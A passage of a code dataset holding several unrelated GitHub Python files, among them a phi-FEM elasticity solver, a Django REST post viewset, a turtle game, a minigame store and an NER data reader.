10.0, 10.0, 10.0, 10.0, 0.1\n h = df.CellDiameter(mesh)\n n = df.FacetNormal(mesh) \n\n V_ex = df.VectorFunctionSpace(mesh, 'CG', degV+2, dim=2)\n u_ex = sol_exact(element = V_ex.ufl_element())\n f = f_exact()\n\n u_ex = df.interpolate(u_ex, V_ex)\n u_D = u_ex \n \n # DG for the interface\n DG0 = df.FunctionSpace(mesh,'DG',0)\n w = df.Function(DG0)\n for c in range(mesh.num_cells()):\n mycell = df.Cell(mesh,c)\n for facet in df.facets(mycell): \n vert1,vert2 = df.vertices(facet) \n if(phi(vert1.point())*phi(vert2.point()) < 0.0 or df.near(phi(vert1.point())*phi(vert2.point()), 0.0)): \n w.vector()[c] = 1.0\n\n # Construction of the bilinear and linear forms\n start_assemble = time.time()\n Gh1 = sigma_p*df.avg(h)*df.inner(df.jump(sigma1(u1),n), df.jump(sigma1(v1),n))*(dS(interf)+dS(gamma2)) \n Gh2 = sigma_p*df.avg(h)*df.inner(df.jump(sigma2(u2),n), df.jump(sigma2(v2),n))*(dS(interf)+dS(gamma1))\n \n au1v1 = df.inner(sigma1(u1), epsilon(v1))*(dx(omega1) + dx(interf)) + Gh1 \\\n + gamma_p*h**(-2)*df.inner(u1,v1)*dx(interf) \\\n + gamma_u*df.inner(sigma1(u1), sigma1(v1))*dx(interf) \n au1z1 = gamma_u*df.inner(sigma1(u1), z1)*dx(interf)\n au1v2 = -gamma_p*h**(-2)*df.inner(u1,v2)*dx(interf)\n au1q = gamma_p*h**(-3)*df.inner(u1,q*phi)*dx(interf)\n \n au2v1 = -gamma_p*h**(-2)*df.inner(u2,v1)*dx(interf)\n au2v2 = df.inner(sigma2(u2), epsilon(v2))*(dx(omega2) + dx(interf)) + Gh2 \\\n + gamma_p*h**(-2)*df.inner(u2,v2)*dx(interf) \\\n + gamma_u*df.inner(sigma2(u2), sigma2(v2))*dx(interf) \n au2z2 = gamma_u*df.inner(sigma2(u2), z2)*dx(interf)\n au2q = -gamma_p*h**(-3)*df.inner(u2,q*phi)*dx(interf)\n \n ay1v1 = (w(\"+\")*df.inner(df.dot(y1(\"+\"),n(\"+\")),v1(\"+\"))+w(\"-\")*df.inner(df.dot(y1(\"-\"),n(\"-\")),v1(\"-\")))*dS(gamma1) + gamma_u*df.inner(y1,sigma1(v1))*dx(interf)\n ay1z1 = gamma_div*df.inner(df.div(y1),df.div(z1))*dx(interf) + gamma_u*df.inner(y1,z1)*dx(interf) \\\n + gamma_y*h**(-2)*df.inner(df.dot(y1,df.grad(phi)),df.dot(z1,df.grad(phi)))*dx(interf)\n ay1z2 = - gamma_y*h**(-2)*df.inner(df.dot(y1,df.grad(phi)),df.dot(z2,df.grad(phi)))*dx(interf)\n\n ay2v2 = (w(\"+\")*df.inner(df.dot(y2(\"+\"),n(\"+\")),v2(\"+\"))+w(\"-\")*df.inner(df.dot(y2(\"-\"),n(\"-\")),v2(\"-\")))*dS(gamma2) + gamma_u*df.inner(y2,sigma2(v2))*dx(interf)\n ay2z1 = -gamma_y*h**(-2)*df.inner(df.dot(y2,df.grad(phi)),df.dot(z1,df.grad(phi)))*dx(interf) \n ay2z2 = gamma_div*df.inner(df.div(y2),df.div(z2))*dx(interf) \\\n + gamma_u*df.inner(y2,z2)*dx(interf) \\\n + gamma_y*h**(-2)*df.inner(df.dot(y2,df.grad(phi)),df.dot(z2,df.grad(phi)))*dx(interf)\n\n apv1 = gamma_p*h**(-3)*df.inner(p*phi,v1)*dx(interf)\n apv2 = -gamma_p*h**(-3)*df.inner(p*phi,v2)*dx(interf)\n apq = gamma_p*h**(-4)*df.inner(p*phi,q*phi)*dx(interf)\n \n lv1 = df.dot(f,v1)*(dx(omega1) + dx(interf)) \n lv2 = df.dot(f,v2)*(dx(omega2) + dx(interf)) \n lz1 = gamma_div * df.inner(f,df.div(z1))*dx(interf) \n lz2 = gamma_div * df.inner(f,df.div(z2))*dx(interf) \n\n A = [[au1v1, au1v2, au1z1, 0.0, au1q], \n [au2v1, au2v2, 0.0, au2z2, au2q],\n [ay1v1, 0.0, ay1z1, ay1z2, 0.0],\n [0.0, ay2v2, ay2z1, ay2z2, 0.0],\n [apv1, apv2, 0.0, 0.0, apq]]\n L = [lv1, lv2, lz1, lz2, 0.0]\n\n AA = mph.block_assemble(A)\n LL = mph.block_assemble(L)\n # definition of the Dirichlet conditions (top, bottom, left and right sides of the square)\n def boundary(x, on_boundary):\n return on_boundary and (df.near(x[0], 0.0) or df.near(x[0], 1.0) or df.near(x[1],1.0) or df.near(x[1],0.0))\n bc2 = mph.DirichletBC(W.sub(1), u_D, boundary) # apply DirichletBC on Omega2\n bcs = mph.BlockDirichletBC([bc2])\n bcs.apply(AA)\n bcs.apply(LL)\n UU = mph.BlockFunction(W)\n mph.block_solve(AA, UU.block_vector(), LL)\n end_solve = time.time()\n\n # Solution on Omega1\n u_h1 = df.project(UU[0], V)\n # Solution on Omega2\n u_h2 = df.project(UU[1], V) \n\n\n # Compute and store relative error for H1 and L2 norms\n relative_error_L2_phi_fem = df.assemble(df.inner(u_ex-u_h1,u_ex-u_h1)*dx(1)+df.inner(u_ex-u_h2,u_ex-u_h2)*dx(2))/df.assemble(df.inner(u_ex,u_ex)*dx(1)+df.inner(u_ex,u_ex)*dx(2))\n relative_error_L2_phi_fem = df.sqrt(relative_error_L2_phi_fem)\n print(\"Relative error L2 phi FEM : \",relative_error_L2_phi_fem)\n error_l2_phi_fem.append(relative_error_L2_phi_fem) \n relative_error_H1_phi_fem = df.assemble(df.inner(df.grad(u_ex-u_h1),df.grad(u_ex-u_h1))*dx(1)+df.inner(df.grad(u_ex-u_h2),df.grad(u_ex-u_h2))*dx(2))/df.assemble(df.inner(df.grad(u_ex),df.grad(u_ex))*dx(1) + df.inner(df.grad(u_ex),df.grad(u_ex))*dx(2)) \n relative_error_H1_phi_fem = df.sqrt(relative_error_H1_phi_fem)\n error_h1_phi_fem.append(relative_error_H1_phi_fem) \n print(\"Relative error H1 phi FEM : \",relative_error_H1_phi_fem)\n time_phi_fem.append(end_solve-start_assemble)\n print(\"time standard FEM : \",end_solve-start_assemble)\n\n\n# Computation of the standard FEM \ndomain = mshr.Rectangle(df.Point(0.0, 0.0), df.Point(1.0, 1.0)) # creation of the domain\ndomain.set_subdomain(1, mshr.Circle(df.Point(0.5,0.5),R)) \ntime_standard, error_l2_standard, error_h1_standard, hh_standard = [], [],[],[]\nfor i in range(start, end, step):\n H = 8*2**(i) # to have approximately the same precision as in the phi-fem computation\n mesh = mshr.generate_mesh(domain,H)\n print(\"Standard fem iteration : \", i)\n # FunctionSpace P1\n V = df.VectorFunctionSpace(mesh, 'CG', degV, dim=2)\n u = df.TrialFunction(V)\n v = df.TestFunction(V)\n n = df.FacetNormal(mesh)\n boundary = 'on_boundary '\n\n V_ex = df.VectorFunctionSpace(mesh, 'CG', degV+2, dim=2)\n u_ex = sol_exact(element = V_ex.ufl_element())\n f = f_exact()\n V_phi = df.FunctionSpace(mesh, \"CG\", degPhi)\n phi = phi_expr(element = V_phi.ufl_element())\n\n # initialization of mesh functions to create Omega1, Omega2 and the boundaries\n omega1, omega2 = 1, 2\n mesh.init(1,2) \n Cell = df.MeshFunction(\"size_t\", mesh, mesh.topology().dim()) \n Cell.set_all(0)\n \n # creation of Omega1 (including the interface)\n for cell in df.cells(mesh) :\n if(phi(cell.midpoint())) < 0.0:\n Cell[cell] = omega1 \n else:\n Cell[cell] = omega2 \n dx = df.Measure(\"dx\", mesh, subdomain_data = Cell)\n\n\n \n # Boundary conditions\n u_D = u_ex \n bc = df.DirichletBC(V, u_D, boundary)\n\n # Variationnal problem\n a = df.inner(sigma1(u), epsilon(v))*dx(omega1) +df.inner(sigma2(u), epsilon(v))*dx(omega2) \n L = df.dot(f,v)*df.dx \n start_assemble = time.time()\n A = df.assemble(a)\n B = df.assemble(L)\n end_assemble = time.time()\n u = df.Function(V)\n bc.apply(A,B) # apply Dirichlet boundary conditions to the problem \n start_solve = time.time()\n df.solve(A, u.vector(), B)\n end_solve = time.time()\n u = df.project(u, V_ex)\n u_ex = df.project(u_ex, V_ex)\n dx_ex = df.Measure(\"dx\", mesh)\n\n # Compute and store h and L2 H1 errors\n hh_standard.append(mesh.hmax())\n relative_error_L2_standard_fem = df.sqrt(df.assemble((df.inner(u_ex-u,u_ex-u)*dx_ex)))/df.sqrt(df.assemble((df.inner(u_ex,u_ex))*dx_ex))\n error_l2_standard.append(relative_error_L2_standard_fem) \n print(\"Relative error L2 standard FEM : \",relative_error_L2_standard_fem)\n relative_error_H1_standard_fem = df.sqrt(df.assemble((df.inner(df.grad(u_ex-u),df.grad(u_ex-u))*dx_ex)))/df.sqrt(df.assemble((df.inner(df.grad(u_ex),df.grad(u_ex)))*dx_ex))\n error_h1_standard.append(relative_error_H1_standard_fem) \n print(\"Relative error H1 standard FEM : \",relative_error_H1_standard_fem)\n time_standard.append(end_solve-start_assemble)\n print(\"time standard FEM : \",end_solve-start_assemble)\n\n\n# Function used to write in the outputs files\ndef output_latex(f,A,B):\n\tfor i in range(len(A)):\n\t\tf.write('(')\n\t\tf.write(str(A[i]))\n\t\tf.write(',')\n\t\tf.write(str(B[i]))\n\t\tf.write(')\\n')\n\tf.write('\\n')\n\n\n# Write the output file for latex\nf = open('outputs/outputs_elasticity_interface_P{name0}.txt'.format(name0=degV),'w')\nf.write('(E_1, nu_1, lambda_1, mu_1) = ( ' + str(E1) + ', ' + str(nu1) + ', ' + str(lambda_1) + ', ' + str(mu1) + ') \\n') \t\nf.write('(E_2, nu_2, lambda_2, mu_2) = ( ' + str(E2) + ', ' + str(nu2) + ', ' + str(lambda_2) + ', ' + str(mu2) + ') \\n')\nf.write('relative L2 norm phi fem: \\n')\t\noutput_latex(f, hh_phi_fem, error_l2_phi_fem)\nf.write('relative H1 norm phi fem : \\n')\t\noutput_latex(f, hh_phi_fem, error_h1_phi_fem)\nf.write('time standard : \\n')\t\noutput_latex(f, error_l2_standard, time_standard)\nf.write('relative L2 norm standard fem: \\n')\t\noutput_latex(f, hh_standard, error_l2_standard)\nf.write('relative H1 norm standard fem : \\n')\t\noutput_latex(f, hh_standard, error_h1_standard)\nf.write('time phi fem : \\n')\t\noutput_latex(f, error_l2_phi_fem, time_phi_fem)\nf.close()\n","repo_name":"michelduprez/phi-FEM-an-efficient-simulation-tool-using-simple-meshes-for-problems-in-structure-mechanics","sub_path":"Phi_Fem_Interface.py","file_name":"Phi_Fem_Interface.py","file_ext":"py","file_size_in_byte":16433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"72705377016","text":"import sys\nfrom coglib import spinwrapper\nfrom opsware_common import errors\n\nspin = spinwrapper.SpinWrapper(url=\"http://127.0.0.1:1007\")\n\nif ( len(sys.argv) != 3 ):\n sys.stdout.write(\"Usage: %s \\n\" % sys.argv[0])\n sys.exit(1)\n\nunit_id = long(sys.argv[1])\nfolder_id = long(sys.argv[2])\n\n# Verify unit exists.\nif ( len(spin.Unit.getIDList(restrict={'unit_id':unit_id})) == 0 ):\n sys.stdout.write(\"Unit %s not found.\\n\" % repr(unit_id))\n sys.exit(1)\n\n# Verify folder exists.\nif ( len(spin.Folder.getIDList(restrict={'folder_id':folder_id})) == 0 ):\n sys.stdout.write(\"Folder %s not found.\\n\" % repr(folder_id))\n sys.exit(1)\n\nfus = spin._FolderUnit.getAll(restrict={'unit_id':unit_id})\nif ( len(fus) == 0 ):\n # Create a new _FolderUnit record:\n sys.stdout.write(\"Moving folderless unit %d into folder %d.\\n\" % (unit_id, folder_id))\n spin._FolderUnit.new(folder_id=folder_id, unit_id=unit_id, link_type_name=\"HARD LINK\")\nelse:\n fu = fus[0]\n old_folder_id = fu[\"folder_id\"]\n if ( old_folder_id != folder_id ):\n sys.stdout.write(\"Moving unit %d from folder %d to folder %d.\\n\" % (unit_id, old_folder_id, folder_id))\n fu.delete()\n spin._FolderUnit.new(folder_id=folder_id, unit_id=unit_id, link_type_name=\"HARD LINK\")\n else:\n sys.stdout.write(\"Unit %d already exists in folder %d.\\n\" % (unit_id, folder_id))\n\n","repo_name":"tsvtln/SA","sub_path":"sa_specific/tools/infra/put_unit_in_folder.py","file_name":"put_unit_in_folder.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"479312673","text":"import numpy as np\nimport pandas as pd\nimport scipy.special\nimport scipy.optimize\nimport matplotlib.pyplot as plt\n\nHORIZONTAL_FOV = 80\nHORIZONTAL_PIX = 1920\nDEGREES_PER_PIX = HORIZONTAL_FOV/HORIZONTAL_PIX\n\ndef get_detection_data():\n data = pd.read_parquet('../preprocessing/gaze_and_target.parquet')\n\n detections = []\n for (p, t), td in data.groupby(['participant_id', 'trial_number']):\n failure = False\n success = False\n \n #target_idxs = np.flatnonzero((td.signtype.values == 'target') & (td.is_visible))\n target_idxs = np.flatnonzero((td.signtype.values == 'mask') & (td.is_visible))\n #target_idxs2 = np.flatnonzero((td.signtype.values == 'target') & (td.is_visible))\n \n if len(target_idxs) == 0:\n continue\n\n # Using just the first moment of target occurence, could use\n # average of all frames with the target present, but this is such\n # a brief moment, it probably makes no difference\n target_i = target_idxs[0]\n\n signs = td.signtype.unique()\n if 'success' in signs:\n success = True\n if 'failure' in signs:\n failure = True\n\n assert not (success and failure)\n if not (success or failure): continue\n \n row = td.iloc[target_i].copy()\n row['success'] = success\n detections.append(row)\n \n dets = pd.DataFrame.from_records(detections)\n pixcols = ['target_x', 'target_y', 'gaze_screen_x', 'gaze_screen_y']\n dets[pixcols] = dets[pixcols]*DEGREES_PER_PIX\n screen_extent = np.array([1920, 1080]).reshape(1, -1)*DEGREES_PER_PIX\n\n dets['target_radius'] = np.linalg.norm(dets[['target_x', 'target_y']].values - screen_extent/2, axis=1)\n print(dets.query(\"scenario == 'swing'\").target_radius.mean())\n dets['target_gaze_distance'] = np.linalg.norm(dets[['target_x', 'target_y']].values - dets[['gaze_screen_x', 'gaze_screen_y']].values, axis=1)\n\n return dets\n\ndef mafc_logit(m):\n def func(x):\n c = (x*m - 1)/(m - 1)\n return scipy.special.logit(c)\n return func\n\nclass LogisticDetection:\n def __init__(self, slope, intercept, p0=1/4):\n self.slope = slope\n self.intercept = intercept\n self.p0 = p0\n\n def __call__(self, x):\n pred = x*self.slope + self.intercept\n p = scipy.special.expit(pred)\n return p + self.p0*(1 - p)\n\n def logpdf(self, x, success):\n p = self(x)\n return np.log(p**success * (1-p)**(1-success))\n\ndef fit_detection(x, success):\n # Just a simple logistic regression\n def loss(param):\n return -np.sum(LogisticDetection(*param).logpdf(x, success))\n \n # Nelder-Mead is good enough for lme4, so we can blame them if\n # this gives bad results.\n fit = scipy.optimize.minimize(loss, [0.0, 0.0], method='Nelder-Mead')\n fit.model = LogisticDetection(*fit.x)\n\n return fit\n\ndef plot_detection_data():\n # TODO: Do this in (approx) view degrees!\n dets = get_detection_data()\n \n dets = dets.query(\"scenario == 'peripheralVisionTest'\")\n #dets = dets.query(\"scenario == 'swing'\")\n #dets = dets.query(\"confidence > 0.9\")\n \n for part, dets in dets.groupby('participant_id'):\n #for dets in [dets]:\n #print(dets.target_radius.unique())\n binshares = []\n for bin, bind in dets.groupby(pd.qcut((dets.target_gaze_distance), 5)):\n #for bin, bind in dets.groupby(dets.target_radius.round()):\n #print(bin)\n binshares.append((bin.mid, bind.success.mean()))\n \n binshares = np.array(binshares)\n plt.plot(binshares[:,0], binshares[:,1], 'o-', label=part)\n plt.axhline(0.25, color='black', label=\"Chance\")\n plt.title(\"Peripheral vision test\")\n plt.xlabel(\"Target displacement from gaze\")\n plt.ylabel(\"Success rate\")\n plt.legend()\n plt.show()\n\ndef fit_detection_data():\n # TODO: Do this in (approx) view degrees!\n dets = get_detection_data()\n \n #dets = dets.query(\"scenario == 'peripheralVisionTest'\")\n dets = dets.query(\"scenario == 'swing'\")\n\n total = 0.0\n \n rng = np.linspace(0, 20, 100)[1:]\n\n for part, partdets in dets.groupby(\"participant_id\"):\n x = (partdets.target_gaze_distance.values)\n success = partdets.success.values\n fit = fit_detection(x, success)\n total -= fit.fun\n\n plt.plot(rng, fit.model(rng), color=f\"C{part}\", label=part)\n print(fit.x)\n print(\"Total logpdf\", total)\n plt.axhline(1/4, color='black', linestyle='dashed')\n plt.legend()\n plt.ylabel(\"Success probability\")\n plt.xlabel(\"Gaze error (degrees)\")\n plt.show()\n\nif __name__ == '__main__':\n #plot_detection_data()\n fit_detection_data()\n","repo_name":"ttammi/blindpursuit20","sub_path":"analysis/detection_accuracy.py","file_name":"detection_accuracy.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35157851085","text":"import turtle as t\r\nimport random as r\r\nt.speed(0)\r\n\r\nt.up()\r\nt.goto(-250,-250)\r\nt.down()\r\nfor x in range(4):\r\n t.fd(500)\r\n t.lt(90)\r\n\r\n\r\n\r\nt.up()\r\n\r\nt.goto(0,0)\r\nt.down()\r\nt.shape(\"turtle\")\r\nt.color(\"white\")\r\n\r\n\r\nte=t.Turtle()\r\nte.up()\r\nte.goto(0,200)\r\nte.down()\r\n\r\nte.shape(\"turtle\")\r\nte.color(\"red\")\r\n\r\n\r\n\r\nts=t.Turtle()\r\nts.up()\r\nts.goto(0,-200)\r\nts.down()\r\nts.shape(\"circle\")\r\nts.color(\"green\")\r\n\r\nt.bgcolor(\"orange\")\r\n\r\n\r\ndef right():\r\n t.setheading(0)\r\n\r\ndef left():\r\n t.setheading(180)\r\n\r\ndef up():\r\n t.setheading(90)\r\ndef down():\r\n t.setheading(270)\r\n\r\ndef play():\r\n\r\n t.fd(7)\r\n \r\n \r\nt.onkeypress(right,\"Right\")\r\nt.onkeypress(left,\"Left\")\r\nt.onkeypress(up,\"Up\")\r\nt.onkeypress(down,\"Down\")\r\nt.listen()\r\nt.up()\r\n\r\nplay()\r\n\r\nx=True\r\nscore=0\r\nwhile x:\r\n play()\r\n te.up()\r\n ang=te.towards(t.pos())\r\n te.setheading(ang)\r\n te.forward(4)\r\n \r\n\r\n if t.distance(ts)<=10:\r\n print(\"먹었다\")\r\n t.write(\"먹었다\")\r\n score=score+1\r\n print(score)\r\n ts_x=r.randint(-240,240)\r\n ts_y=r.randint(-240,240)\r\n ts.up()\r\n ts.goto(ts_x,ts_y)\r\n\r\n if t.distance(te)<=10:\r\n x=False\r\n print(\"잡혔다\")\r\n t.write(\"game over\"+str(score),False,\"center\",(\"\",20))\r\n\r\n","repo_name":"yoozeong/shin-yu-jeong","sub_path":"터틀런_신유정.py","file_name":"터틀런_신유정.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5918721242","text":"from django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.http import HttpResponseServerError\nfrom rest_framework import status\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom django.utils.timezone import make_aware\nfrom datetime import datetime\nfrom dbyapi.models import Post, DiyUser, Category, Comment\n\n\nclass PostView(ViewSet):\n \"\"\"User can see post information\"\"\"\n\n def create(self, request):\n \"\"\"Hanlde POST operations for post\n Returns: Response -- JSON serialized post instance\"\"\"\n\n diyuser = DiyUser.objects.get(user=request.auth.user)\n category = Category.objects.get(pk=request.data['category'])\n\n post = Post()\n post.category = category\n post.title = request.data['title']\n post.content = request.data['content']\n post.image = request.data['image_url']\n post.diyuser = diyuser\n\n try:\n post.save()\n serializer = PostSerializer(post, context={'request': request})\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except ValidationError as ex:\n return Response({'reason': ex.message}, status=status.HTTP_400_BAD_REQUEST)\n\n def retrieve(self, request, pk=None):\n\n try:\n post = Post.objects.get(pk=pk)\n serializer = PostSerializer(post, context={'request': request})\n return Response(serializer.data)\n except Exception as ex:\n return HttpResponseServerError(ex)\n\n def list(self, request):\n \"\"\"Handle GET requests to get all post\n Returns: Response -- JSON serialized list of posts\"\"\"\n\n posts = Post.objects.all()\n\n # if diyuser is not None:\n # posts = posts.filter(diyuser_id=diyuser)\n\n # if category is not None:\n # posts = posts.filter(categroy__id=category)\n\n serializer = PostSerializer(\n posts, many=True, context={'request': request})\n return Response(serializer.data)\n\n\n def update(self, request, pk=None):\n \"\"\"Handle PUT requests for a game\n Returns: Response -- Empty body with 204 status code\"\"\"\n\n diyuser = DiyUser.objects.get(pk=request.data['diyuser'])\n category = Category.objects.get(pk=request.data['category'])\n\n post = Post.objects.get(pk=pk)\n post.category = category\n post.title = request.data['title']\n post.content = request.data['content']\n post.image_url = request.data['image_url']\n post.diyuser = diyuser\n post.save()\n\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk=None):\n \"\"\"Handle DELETE requets for a single post\n Returns: Response -- 200, 404, or 500 status code\"\"\"\n\n try:\n post = Post.objects.get(pk=pk)\n post.delete()\n\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n except Post.DoesNotExist as ex:\n return Response({'message': ex.args[0]},\n status=status.HTTP_404_NOT_FOUND)\n except Exception as ex:\n return Response({'message': ex.args[0]},\n status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\nclass PostUserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'email']\n\n\nclass PostDiyUserSerializer(serializers.ModelSerializer):\n\n user = PostUserSerializer(many=False)\n\n class Meta:\n model = DiyUser\n fields = ['id', 'user', 'bio', 'image_url']\n depth = 1\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Category\n fields = ['id', 'label']\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n \"\"\"JSON serializer for comments\n Arguments: serializers\"\"\"\n\n class Meta:\n model = Comment\n fields = ('id', 'content', 'date', 'post', 'diyuser')\n depth = 1\n\n\nclass PostSerializer(serializers.ModelSerializer):\n\n diyuser = PostDiyUserSerializer(many=False)\n category = CategorySerializer(many=False)\n comments = CommentSerializer(many=True)\n\n class Meta:\n model = Post\n fields = ('id', 'diyuser', 'title', 'category',\n 'date', 'image_url', 'content', 'comments')\n depth = 3\n","repo_name":"melodybarker/DesignedByYou","sub_path":"dbyapi/views/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43456573807","text":"from Game.utils.items import collectibles\nfrom Game.utils.convert_items import convert_items\nfrom Game.utils.json_manager import JsonManager\nfrom Game.utils.menu import menu, clear\nfrom Game.utils.store import Store\n\n\nclass SaveGame:\n\n def __init__(self, auto_save):\n self.auto_save = auto_save\n\n @staticmethod\n def autosave(function):\n def save_game(self, *args, **kwargs):\n function(self, *args, **kwargs)\n if self.auto_save:\n self.save_game()\n\n return save_game\n\n\nclass MiniGames(SaveGame):\n\n def __init__(self, json_manager: JsonManager, name: str, data: dict):\n self.name = name\n self.coins = data['moedas']\n self.items = convert_items(data['itens'])\n self.json_manager = json_manager\n SaveGame.__init__(self, True)\n\n def menu(self):\n while True:\n options = {'jogar': self.play, 'coleção': self.collection, 'loja': self.store, 'sair': exit}\n\n options[menu(options, head=self.progress)]()\n\n def collection(self):\n for v in self.items.values():\n print(v.found)\n print(', '.join(map(str, v)), '\\n')\n\n input('Enter para voltar: ')\n clear()\n\n @SaveGame.autosave\n def store(self):\n store = Store(self.coins)\n\n for rarity, given, coins in store.box_purchases():\n if rarity:\n if given in self.items[rarity]:\n print('Item repetido!\\n')\n\n else:\n print()\n self.items[rarity].append(given)\n\n self.coins = coins\n\n @SaveGame.autosave\n def play(self):\n store = Store(self.coins)\n\n for coins in store.match_purchases():\n self.coins = coins\n\n def save_game(self):\n data = self.json_manager.read_json()\n data[self.name] = {'moedas': self.coins, 'itens': {k: list(map(str, v)) for k, v in self.items.items()}}\n\n self.json_manager.update_json(data)\n\n @property\n def progress(self):\n def _sum(d): return sum((len(v) for v in d.values()))\n return f'{self.name}\\nProgresso: {int((_sum(self.items) / _sum(collectibles)) * 100)}%\\nMoedas: {self.coins}'\n","repo_name":"Robertoskb/minigame","sub_path":"Game/utils/minigames.py","file_name":"minigames.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12340386167","text":"from src.star_command import feat_engineering_pipe\nfrom sklearn.preprocessing import Normalizer, OneHotEncoder, Imputer\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import TruncatedSVD, NMF\nfrom src.preprocessing.transformers_categorical import *\n\npipe_transforms = feat_engineering_pipe(\n tr_etat,\n tr_magasin,\n tr_categorie,\n tr_categorie1, tr_categorie2, tr_categorie3, tr_categorie4,\n tr_couleur\n)\n\nselect_feat = [\n (\"encoded_etat\", None),\n (\"encoded_nom_magasin\", None),\n (\"prix\", None),\n (\"nb_images\", None),\n (\"longueur_image\", None),\n (\"largeur_image\", None),\n (\"poids\", None),\n (\"encoded_categorie\", None),\n (\"encoded_sous_categorie_1\", None),\n (\"encoded_sous_categorie_2\", None),\n (\"encoded_sous_categorie_3\", None),\n (\"encoded_sous_categorie_4\", None),\n (\"description_produit\", [TfidfVectorizer(max_features=2**16,\n min_df=2, stop_words='english',\n use_idf=True),\n TruncatedSVD(2)]),\n (\"encoded_couleur\", None),\n (\"vintage\", None)\n]\n\n","repo_name":"mratsim/meilleur-data-scientist-france-2018","sub_path":"m110_feat_eng.py","file_name":"m110_feat_eng.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"38770752428","text":"from random import choice \n\ndef sommation(T: list) -> float:\n a = 0\n for nombre in T:\n a = a+nombre\n return a\n\ndef somme(L):\n return sum(L)\n\ndef test_unitaire(numerous_benchmark):\n failed = 0\n success_smb = ['🔥','✨','🌠','✅','🥇','🎖']\n fail_smb = ['🌩','🙈','🙉','⛑','🌋','💣']\n if type(numerous_benchmark[0]) not in [list, tuple]:\n type_bench = 'multiple' \n numerous_benchmark = (numerous_benchmark, )\n\n for benchmark in numerous_benchmark:\n print(f\">>> Test de la fonction ** {benchmark[0].split('(')[0].upper()} **\")\n \n for k, test in enumerate(benchmark, 1):\n if eval(test):\n print(f'Test {k} réussi : {test} ')\n else:\n print(f'Test {k} échoué : {test} ')\n failed += 1\n\n if not failed :\n print(f\"Bravo vous avez réussi tous les tests {choice(success_smb)}\")\n else :\n if failed == 1 : msg = f\"{failed} test a échoué. \"\n else : msg = f\"{failed} tests ont échoué. \"\n print(msg + f\"Reprenez votre code {choice(fail_smb)}\")\n\nb1 = ['somme([]) == None', 'somme([1]) == 1', 'somme([1,2]) == 3', 'somme([-1,1]) == 0']\nb2 = ['somme([]) == None', 'somme([1]) == 1', 'somme([1,2]) == 3', 'somme([-1,1]) == 0']\nbenchmark = b1\n\ntest_unitaire(benchmark)","repo_name":"dfauchard1/coursNSI1.github.io","sub_path":"test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"4716221383","text":"# -*- coding: utf-8 -*-\n# @Author: Jie\n# @Date: 2017-06-15 14:23:06\n# @Last Modified by: Jie Yang, Contact: jieynlp@gmail.com\n# @Last Modified time: 2019-02-14 12:23:52\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nimport sys\nimport numpy as np\nfrom itertools import groupby\n\ndef normalize_word(word):\n new_word = \"\"\n for char in word:\n if char.isdigit():\n new_word += '0'\n else:\n new_word += char\n return new_word\n\n\ndef read_instance(input_file, word_alphabet, char_alphabet, feature_alphabets, label_alphabet, number_normalized, max_sent_length, sentence_classification=False, split_token='\\t', char_padding_size=-1, char_padding_symbol = ''):\n feature_num = len(feature_alphabets)\n in_lines = open(input_file,'r', encoding=\"utf8\").readlines()\n instance_texts = []\n instance_Ids = []\n words = []\n labels = []\n word_Ids = []\n label_Ids = []\n doc_id = \"\"\n # else:\n ### for sequence labeling data format i.e. CoNLL 2003\n for line in in_lines:\n if not doc_id: \n doc_id = line.strip()\n continue\n if len(line) > 2:\n pairs = line.strip().split()\n word = pairs[0]\n if sys.version_info[0] < 3:\n word = word.decode('utf-8')\n words.append(word)\n if number_normalized:\n word = normalize_word(word)\n label = pairs[-1]\n labels.append(label)\n word_Ids.append(word_alphabet.get_index(word))\n label_Ids.append(label_alphabet.get_index(label))\n else:\n if (len(words) > 0) and ((max_sent_length < 0) or (len(words) < max_sent_length)) :\n # get sent_word_Ids_list (split with \".\")\n period_id = word_alphabet.get_index(\".\")\n sent_word_Ids_list = []\n idx = 0\n sent_word_Ids = []\n while idx <= len(word_Ids) - 1:\n sent_word_Ids.append(word_Ids[idx])\n if word_Ids[idx] == period_id:\n sent_word_Ids_list.append(sent_word_Ids)\n sent_word_Ids = []\n idx += 1\n if sent_word_Ids:\n sent_word_Ids_list.append(sent_word_Ids)\n\n instance_texts.append([words, labels, doc_id])\n instance_Ids.append([word_Ids, sent_word_Ids_list, label_Ids])\n # import ipdb; ipdb.set_trace()\n\n words = []\n labels = []\n word_Ids = []\n label_Ids = []\n doc_id = \"\"\n if (len(words) > 0) and ((max_sent_length < 0) or (len(words) < max_sent_length)) :\n instance_texts.append([words, labels, doc_id])\n # instance_Ids.append([word_Ids, label_Ids])\n instance_Ids.append([word_Ids, sent_word_Ids_list, label_Ids])\n words = []\n labels = []\n word_Ids = 